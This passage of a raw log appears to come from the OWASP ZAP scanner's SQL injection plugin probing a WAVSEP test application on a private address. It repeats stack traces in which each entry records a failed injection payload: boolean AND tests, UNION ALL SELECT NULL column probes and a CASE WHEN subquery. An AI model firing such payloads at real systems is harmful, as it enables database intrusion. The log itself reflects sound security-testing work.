Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679601 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 8231=6138 AND ('knrd'='knrd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8231=6138 AND ('knrd'='knrd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679602 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 8240=8240 AND ('ULvq'='ULvq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8240=8240 AND ('ULvq'='ULvq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679602 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679602 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9679603 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 8231=6138 AND ('knrd'='knrd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8231=6138 AND ('knrd'='knrd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679604 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 6310=5050 AND 'cMNh'='cMNh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6310=5050 AND 'cMNh'='cMNh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679604 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 7855=7855 AND 'AMOC'='AMOC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 7855=7855 AND 'AMOC'='AMOC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679605 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 6310=5050 AND 'cMNh'='cMNh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6310=5050 AND 'cMNh'='cMNh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679606 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 7247=1881 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7247=1881 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679607 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 8497=8497 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8497=8497 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679608 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 7247=1881 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7247=1881 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679608 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 9281=2499-- MgDk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9281=2499-- MgDk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679616 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 4080=4080-- VUvA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4080=4080-- VUvA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679617 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 9281=2499-- MgDk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9281=2499-- MgDk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679623 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3390=8707) THEN 3390 ELSE 3390*(SELECT 3390 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (3390=8707) THEN 3390 ELSE 3390*(SELECT 3390 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 